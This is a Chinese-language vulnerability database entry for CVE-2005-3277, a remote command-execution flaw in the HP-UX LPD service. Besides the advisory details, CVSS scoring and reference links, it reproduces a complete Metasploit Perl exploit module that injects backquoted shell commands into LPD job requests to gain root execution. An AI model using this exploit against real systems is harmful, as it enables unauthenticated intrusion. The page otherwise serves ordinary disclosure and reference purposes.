CVE-2005-3277
CVSS10.0
发布时间 :2005-10-21 14:02:00
修订时间 :2008-09-05 16:53:56
NMCOE    

[原文]The LPD service in HP-UX 10.20 11.11 (11i) and earlier allows remote attackers to execute arbitrary code via shell metacharacters ("`" or single backquote) in a request that is not properly handled when an error occurs, as demonstrated by killing the connection, a different vulnerability than CVE-2002-1473.


[CNNVD]HP-UX LPD 任意指令执行漏洞(CNNVD-200510-162)

        HP-UX(取自Hewlett Packard UniX)是惠普科技公司(HP, Hewlett-Packard)以System V为基础研制的unix作业系统
        HP-UX 10.20 11.11 (11i)及之前版本的LPD服务可以使远程攻击者借助出错时未正确处理的请求中的shell元字符("`" 或单个后引号) ,执行任意代码,比如终止连接。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:hp:hp-ux:11.00HP-UX 11.00
cpe:/o:hp:hp-ux:10.20HP HP-UX 10.20
cpe:/o:hp:hp-ux:11.11HP-UX 11.11

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3277
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3277
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200510-162
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/15136
(UNKNOWN)  BID  15136
http://www.frsirt.com/exploits/20051019.hpux_lpd_exec.pm.php
(VENDOR_ADVISORY)  MISC  http://www.frsirt.com/exploits/20051019.hpux_lpd_exec.pm.php
http://archives.neohapsis.com/archives/hp/2002-q3/0064.html
(UNKNOWN)  MISC  http://archives.neohapsis.com/archives/hp/2002-q3/0064.html

- 漏洞信息

HP-UX LPD 任意指令执行漏洞
危急 输入验证
2005-10-21 00:00:00 2006-01-19 00:00:00
远程  
        HP-UX(取自Hewlett Packard UniX)是惠普科技公司(HP, Hewlett-Packard)以System V为基础研制的unix作业系统
        HP-UX 10.20 11.11 (11i)及之前版本的LPD服务可以使远程攻击者借助出错时未正确处理的请求中的shell元字符("`" 或单个后引号) ,执行任意代码,比如终止连接。

- 公告与补丁

        暂无数据

- 漏洞信息 (1261)

HP-UX <= 11.11 lpd Remote Command Execution Exploit (meta) (EDBID:1261)
hp-ux remote
2005-10-19 Verified
515 H D Moore
N/A [点击下载]
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::hpux_lpd_exec;
use base "Msf::Exploit";
use IO::Socket;
use IO::Select;
use strict;
use Pex::Text;

my $advanced = { };

my $info =
  {
	'Name'  => 'HP-UX LPD Command Execution',
	'Version'  => '$Revision: 1.13 $',
	'Authors' => [ 'H D Moore <hdm [at] metasploit.com>'],
	'Arch'  => [ ],
	'OS'    => [ 'hpux' ],
	'Priv'  => 0,
	'UserOpts'  =>
	  {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The LPD server port', 515],
	  },
	'Payload' =>
	  {
		'Space'    => 200,
		'Keys'     => ['cmd_nospaceslash'],
	  },

	'Description'  => Pex::Text::Freeform(qq{
        This exploit abuses an unpublished vulnerability in the HP-UX LPD
        service. This flaw allows an unauthenticated attacker to execute
        arbitrary commands with the privileges of the root user. The LPD
        service is only exploitable when the address of the attacking system
        can be resolved by the target. This vulnerability was silently patched
		with the buffer overflow flaws addressed in HP Security Bulletin HPSBUX0208-213.
}),
	'Refs'  =>  [
		['URL', 'http://archives.neohapsis.com/archives/hp/2002-q3/0064.html']
	  ],

	'Keys' => ['lpd'],
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit {
	my $self = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $target_path = $self->GetVar('RPATH');
	my $cmd = $self->GetVar('EncodedPayload')->RawPayload;

	my $res;

	# We use a second connection to exploit the bug
	my $s = Msf::Socket::Tcp->new
	  (
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
		'SSL'       => $self->GetVar('SSL'),
	  );
	  
	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}

	srand(time() + $$);
	my $num = int(rand() * 1000);

	$s->Send("\x02msf$num`$cmd`\n");
	$res = $s->Recv(1, 5);
	if (ord($res) != 0) {
		$self->PrintLine("[*] The target did not accept our second job request command");
		$s->Close;
		return;
	}

	$s->Send("\x02 32 cfA187control\n");
	$res = $s->Recv(1, 5);
	if (ord($res) != 0) {
		$self->PrintLine("[*] The target did not accept our control file");
		$s->Close;
		return;
	}

	$self->PrintLine("[*] Remember to kill the telnet process when finished");
	$self->PrintLine("[*] Forcing an error and hijacking the cleanup routine...");
	$s->Send(Pex::Text::AlphaNumText(16384));
	$s->Close;

	return;
}

# milw0rm.com [2005-10-19]
		

- 漏洞信息

21592
HP-UX lpd Shell Metacharacter Remote Command Execution
Remote / Network Access
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-10-19 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站